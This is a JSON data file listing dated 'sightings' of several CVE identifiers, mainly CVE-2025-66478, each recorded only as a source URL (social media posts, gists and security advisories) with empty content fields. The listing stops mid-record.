{"vulnerability": "cve-2025-6647", "sightings": [{"uuid": "63b0165f-926b-4bd2-8ed1-135a9866ddad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-6647", "type": "seen", "source": "http://www.zerodayinitiative.com/advisories/ZDI-25-432/", "content": "", "creation_timestamp": "2025-06-25T03:00:00.000000Z"}, {"uuid": "a1e80f33-8662-4a24-85ba-14f2e5a95bb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-6647", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lshuaacms42a", "content": "", "creation_timestamp": "2025-06-26T00:21:54.006868Z"}, {"uuid": "b83094ca-bed9-4cd6-b30b-a5b60a339788", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/alexandreborges.bsky.social/post/3m76gf7az7k27", "content": "", "creation_timestamp": "2025-12-04T16:47:43.818440Z"}, {"uuid": "08f1c74a-0c35-4b60-9ee7-e29e913965a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66476", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3m727kyx2gv2a", "content": "", "creation_timestamp": "2025-12-03T00:35:01.272228Z"}, {"uuid": "97f2fb09-a7c4-49d8-8e80-cd174cfe03b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/weld.bsky.social/post/3m73uolv7hs2r", "content": "", "creation_timestamp": "2025-12-03T16:25:30.705006Z"}, {"uuid": "7ff05cbb-fe8c-4a28-baa9-293748a0bc8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/weld.bsky.social/post/3m73uolvee22r", "content": "", "creation_timestamp": "2025-12-03T16:25:31.361165Z"}, {"uuid": "f057a6ed-e016-42fc-8d41-67c6e5fe7a6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/weld.bsky.social/post/3m73uolvfdc2r", "content": "", "creation_timestamp": "2025-12-03T16:25:31.999324Z"}, {"uuid": "e80eb9d3-f41e-44aa-b9c1-649b5fbbcf76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/mynameisv.bsky.social/post/3m73v4cllyc24", "content": "", "creation_timestamp": "2025-12-03T16:33:12.483455Z"}, {"uuid": "99f0866f-f8d5-417e-8f86-d75a957f0f1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/nextjs.org/post/3m73vmzmdtw2q", "content": "", "creation_timestamp": "2025-12-03T16:42:31.932595Z"}, {"uuid": "159ffa0c-b057-4b74-8453-290d38f1d229", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://infosec.exchange/users/mttaggart/statuses/115656660264185977", "content": "", "creation_timestamp": "2025-12-03T16:49:43.627364Z"}, {"uuid": "dfb34776-45fb-4ee1-a991-4d5e6759f21a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/msw.bsky.social/post/3m745s3kirc2f", "content": "", "creation_timestamp": "2025-12-03T19:08:31.160967Z"}, {"uuid": "29f0bcbf-5830-44bb-bc6b-0e93939f7304", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66476", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/228", "content": "", "creation_timestamp": "2025-12-02T20:59:19.000000Z"}, {"uuid": "6f7b7ccc-82ff-4a8d-9909-dd07e097916c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/ciphersweet.bsky.social/post/3m74l6q2nws26", "content": "", "creation_timestamp": "2025-12-03T23:08:18.629510Z"}, {"uuid": "c10f7bdf-4b50-4f9c-8fbf-564812be7afc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/sjagoori/7972551ad9c319d37780b80be8366f65", "content": "", "creation_timestamp": "2025-12-03T23:25:32.000000Z"}, {"uuid": "b156195e-0d83-4356-a6de-41795c427790", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/twada.bsky.social/post/3m74o275mpk2w", "content": "", "creation_timestamp": "2025-12-03T23:59:24.070876Z"}, {"uuid": "30fc9762-f230-484d-90ab-b9829a677952", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/sjagoori/25af87c2b1e06dc417abe886562299fc", "content": "", "creation_timestamp": "2025-12-04T00:10:25.000000Z"}, {"uuid": "0594ecc8-6bd8-40e9-ba54-51eda75583e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3m74taoanjw2e", "content": "", "creation_timestamp": "2025-12-04T01:32:29.417957Z"}, {"uuid": "72089dac-0442-44a0-93b3-1a2a9bec9ffe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3m74vwenuwq2i", "content": "", "creation_timestamp": "2025-12-04T02:20:24.813105Z"}, {"uuid": "4d84ea89-20d7-49fc-8f7e-7a88d097e672", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/jkanematsu.bsky.social/post/3m74w2t7pyc2m", "content": "", "creation_timestamp": "2025-12-04T02:20:41.995420Z"}, {"uuid": "e78c58f1-c11f-4f4c-b394-a890722e8ea1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/zhangjintao9020.bsky.social/post/3m74w6j6xm22j", "content": "", "creation_timestamp": "2025-12-04T02:25:00.307736Z"}, {"uuid": "9d9346d2-9971-456f-a0cb-cfee44c8a75d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66476", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3m74wibjhc42i", "content": "", "creation_timestamp": "2025-12-04T02:30:25.113188Z"}, {"uuid": "80beada0-d81f-4633-b938-0a78be459b8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3m74wpsqylw22", "content": "", "creation_timestamp": "2025-12-04T02:34:38.444137Z"}, {"uuid": "2ccfc908-5cc4-4b73-8bdf-b828de9d69ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/nillpo.bsky.social/post/3m74xhq37qc2l", "content": "", "creation_timestamp": "2025-12-04T02:48:01.219833Z"}, {"uuid": "d4f6ab22-cd7c-48d8-b815-f683fd5712e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/jstek.io/post/3m74xrg6ppp22", "content": "", "creation_timestamp": "2025-12-04T02:53:26.323266Z"}, {"uuid": "5c2c75fc-88b7-40c8-86d6-3a684938c03a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3m753kfgi752q", "content": "", "creation_timestamp": "2025-12-04T04:01:05.325382Z"}, {"uuid": "812e4696-a835-4e18-8dfc-4961ed5881a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/crowdcyber.bsky.social/post/3m755reycx327", "content": "", "creation_timestamp": "2025-12-04T04:40:47.513537Z"}, {"uuid": "8ac2913e-8f6e-4d01-b93c-5d58e5693fd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3m75dvvanob2o", "content": "", "creation_timestamp": "2025-12-04T06:30:40.841008Z"}, {"uuid": "733dbdfe-bc57-4631-b26c-9bdbf10713df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/scanash.com/post/3m75ekjtk3c23", "content": "", "creation_timestamp": "2025-12-04T06:42:14.602014Z"}, {"uuid": "7c14dbed-5028-4fd4-9dfa-68ba6a98a1c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/r-netsec-bot.bsky.social/post/3m75gbxxhiw2e", "content": "", "creation_timestamp": "2025-12-04T07:13:14.409014Z"}, {"uuid": "5d951aba-d8d1-4b9b-b1a2-86d98e3275de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/r-netsec.bsky.social/post/3m75gw7g3262q", "content": "", "creation_timestamp": "2025-12-04T07:24:32.844114Z"}, {"uuid": "bb2b053a-89de-45db-b96c-a77bfc3510fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-66478", "type": "seen", "source": "https://bsky.app/profile/cyberveille-ch.bsky.social/post/3m75klfobzc2i", "content": "", "creation_timestamp": "2025-12-04T08:30:05.791498Z"}, {"uuid": "a11e511f-2f57-4817-969e-4e33aa273047", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3m75kvy2bnu2h", "content": "", "creation_timestamp": "2025-12-04T08:36:00.540447Z"}, {"uuid": "66e4a596-e5fd-4235-97ac-4dc6af590db9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/houseofint3/275011c3e5a754b9f828a0d6ea1155f3", "content": "", "creation_timestamp": "2025-12-04T09:33:39.000000Z"}, {"uuid": "e9da9ec0-85a8-4bb3-b7c0-8e5afc8f8b30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/mynameisv.bsky.social/post/3m75p6pvdek24", "content": "", "creation_timestamp": "2025-12-04T09:52:32.623597Z"}, {"uuid": "99f0f291-d485-4396-ad4b-4a3e659b8ef7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182", "content": "", "creation_timestamp": "2025-12-03T20:11:13.472202Z"}, {"uuid": "4304a2a2-183a-44f4-8888-2a6a38831b7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp", "content": "", "creation_timestamp": "2025-12-03T20:13:38.435450Z"}, {"uuid": "9ec6ab19-52b8-4449-89f4-6202ed63ec56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mftwtzgncc2y", "content": "", "creation_timestamp": "2026-02-27T14:39:26.792760Z"}, {"uuid": "64d00c4d-2dc2-4af3-a722-af1afc868c0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-66478", "type": "seen", "source": "https://infosec.exchange/users/alexandreborges/statuses/115662326298869319", "content": "", "creation_timestamp": "2025-12-04T16:50:41.785641Z"}, {"uuid": "b97c33e4-7edb-46e7-8d89-d65a688bfcbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/gadicc/5ec4930e63dec2030b95a4e770b1e055", "content": "", "creation_timestamp": "2025-12-04T17:20:17.000000Z"}, {"uuid": "4ffa7abe-da24-4897-8961-2aeece6a412d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/poc-popoyama.misskey.systems.ap.brid.gy/post/3m74gz24rli62", "content": "", "creation_timestamp": "2025-12-03T21:53:37.829596Z"}, {"uuid": "b5dd1fb6-0cab-4a89-bfaf-9d1a8580f3dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/securityrss.bsky.social/post/3m74hm322hc2x", "content": "", "creation_timestamp": "2025-12-03T22:04:07.644152Z"}, {"uuid": "4afba691-6439-46c5-a7bd-68a928a431a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/fastly.com/post/3m74i2l4nik2b", "content": "", "creation_timestamp": "2025-12-03T22:12:15.956912Z"}, {"uuid": "b53aac70-36a8-4637-9735-61eb73c220ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/eyalestrin.bsky.social/post/3m76jjbuso52y", "content": "", "creation_timestamp": "2025-12-04T17:43:39.813912Z"}, {"uuid": "fde4e108-06f7-4e31-8ee5-6bbe30657a37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://advisories.ncsc.nl/advisory?id=NCSC-2025-0380", "content": "", "creation_timestamp": "2025-12-03T19:11:57.000000Z"}, {"uuid": "67dc9adc-6f76-4584-8d41-5aecdb82a54c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/bitsight.bsky.social/post/3m76jy2eb7t2w", "content": "", "creation_timestamp": "2025-12-04T17:51:56.210540Z"}, {"uuid": "cdd257bf-26d6-4d1d-ae9a-06642e33fc26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3m76kz7iok22v", "content": "", "creation_timestamp": "2025-12-04T18:10:28.036029Z"}, {"uuid": "f9e1fbb6-cb79-4789-be3e-f1fd63784e54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/eyalestrin.bsky.social/post/3m76qct43b425", "content": "", "creation_timestamp": "2025-12-04T19:45:19.622078Z"}, {"uuid": "a1b503ee-3632-4b0d-b126-9f98029d853f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/intruder-io.bsky.social/post/3m7aauuyxhc26", "content": "", "creation_timestamp": "2025-12-05T10:14:26.393939Z"}, {"uuid": "7c31e3a8-fe32-48e7-9fd6-f491a903bc32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/al25-018-vulnerability-affecting-react-server-components-cve-2025-55182", "content": "", "creation_timestamp": "2025-12-04T15:50:47.000000Z"}, {"uuid": "650124a7-21fe-40bd-9933-f06420a76db1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/246", "content": "", "creation_timestamp": "2025-12-04T16:58:25.000000Z"}, {"uuid": "7ecabfd5-9820-465d-95fc-e419dbec851f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-66478", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3m76u4dny2x2t", "content": "", "creation_timestamp": "2025-12-04T20:53:17.411413Z"}, {"uuid": "9108529d-6192-4180-b795-c405430e466a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66476", "type": "seen", "source": "https://bsky.app/profile/securitylab-jp.bsky.social/post/3m776s6erj22p", "content": "", "creation_timestamp": "2025-12-05T00:04:30.414263Z"}, {"uuid": "e7e5fbf6-9ca8-4605-ad90-b7a553dd9b82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mfu4tzpikk2y", "content": "", "creation_timestamp": "2026-02-27T16:26:49.137477Z"}, {"uuid": "a67f9759-28c5-46fe-bba2-f4679e918eea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/115666615697305338", "content": "", "creation_timestamp": "2025-12-05T11:01:32.427381Z"}, {"uuid": "90466fdf-4f1f-45f8-901b-7a8e9f60ed0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-017d7a15-ce96008bd167edb2", "content": "", "creation_timestamp": "2025-12-05T11:48:34.353770Z"}, {"uuid": "6d3b0027-31e4-4726-8b9e-d50389c39540", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/newsanalysis.com/post/3m75scwjtmn2u", "content": "", "creation_timestamp": "2025-12-04T10:48:31.426291Z"}, {"uuid": "4686ee4e-f7ab-42ae-ac8c-e3f94177b96e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/115660952315120918", "content": "", "creation_timestamp": "2025-12-04T11:01:15.590127Z"}, {"uuid": "326459ea-260f-45fb-8a64-9684b410e2e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3m75vg7frsh2s", "content": "", "creation_timestamp": "2025-12-04T11:44:01.969686Z"}, {"uuid": "f9028ceb-479e-4e6e-8380-34d01474e524", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/hnbot.gsuscs.xyz/post/3m75wdn6qwk2m", "content": "", "creation_timestamp": "2025-12-04T12:00:29.833686Z"}, {"uuid": "4ccc9229-ef56-4c5a-8f52-9d47c8a30dce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/jasonstcyr.com/post/3m75wdxo37q2y", "content": "", "creation_timestamp": "2025-12-04T12:00:41.080163Z"}, {"uuid": "d976bd92-ec33-4fd9-93f8-9ed6b91a03cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/viralpique.bsky.social/post/3m75wl3rrd22f", "content": "", "creation_timestamp": "2025-12-04T12:04:39.993335Z"}, {"uuid": "10481f94-8946-4c44-a46e-bade46c4a151", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/zaproxy.org/post/3m75xrpkfxc2o", "content": "", "creation_timestamp": "2025-12-04T12:26:15.844454Z"}, {"uuid": "3c9d44d8-b8a2-4741-90c6-3c7aaaf2f88f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/hackernewstop5.bsky.social/post/3m75xtwgcpj2f", "content": "", "creation_timestamp": "2025-12-04T12:27:30.143296Z"}, {"uuid": "43550281-a91f-4a51-b731-2dceae6ce438", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/betterhn20.e-work.xyz/post/3m75yttdt2k26", "content": "", "creation_timestamp": "2025-12-04T12:45:21.103781Z"}, {"uuid": "448523e7-b96a-4969-ae88-fdfc59f9d229", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3m7652jln4z23", "content": "", "creation_timestamp": "2025-12-04T14:00:43.906250Z"}, {"uuid": "bfb5ba2a-0b2f-462b-8fe9-cc0621a2cc95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3m76abwr4sgu2", "content": "", "creation_timestamp": "2025-12-04T14:59:03.297885Z"}, {"uuid": "9c70db11-1854-4003-906e-1976b17b4746", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/fastly.com/post/3m7b43w4roc2p", "content": "", "creation_timestamp": "2025-12-05T18:21:36.092684Z"}, {"uuid": "80600424-dcb3-47ef-bee8-d0ddb1f7dcd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/shehackspurple.bsky.social/post/3m7b6nzrsfk2h", "content": "", "creation_timestamp": "2025-12-05T19:07:27.590659Z"}, {"uuid": "29917788-4cef-4b30-9a3d-5a7ed64f64c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3m7b6xhddwo2s", "content": "", "creation_timestamp": "2025-12-05T19:12:43.862797Z"}, {"uuid": "96ad349d-6610-404a-942b-bcb7c723247e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3m7b6yojqt42s", "content": "", "creation_timestamp": "2025-12-05T19:13:24.572257Z"}, {"uuid": "a2007de4-19e9-4617-a790-5f72cf58673f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/250", "content": "", "creation_timestamp": "2025-12-05T17:54:47.000000Z"}, {"uuid": "f6e51d2e-efd5-4ad7-ac58-53f70a5cbc8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-66478", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3m7bcpyq3ht2g", "content": "", "creation_timestamp": "2025-12-05T20:20:08.946631Z"}, {"uuid": "7410bdff-929f-4003-8f96-76f9be19d7ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/dailyzenntrends.bsky.social/post/3m7bg4z2ofm2z", "content": "", "creation_timestamp": "2025-12-05T21:21:06.227539Z"}, {"uuid": "2fbb408e-63f2-43f3-86ca-c9d2de5c7e0d", 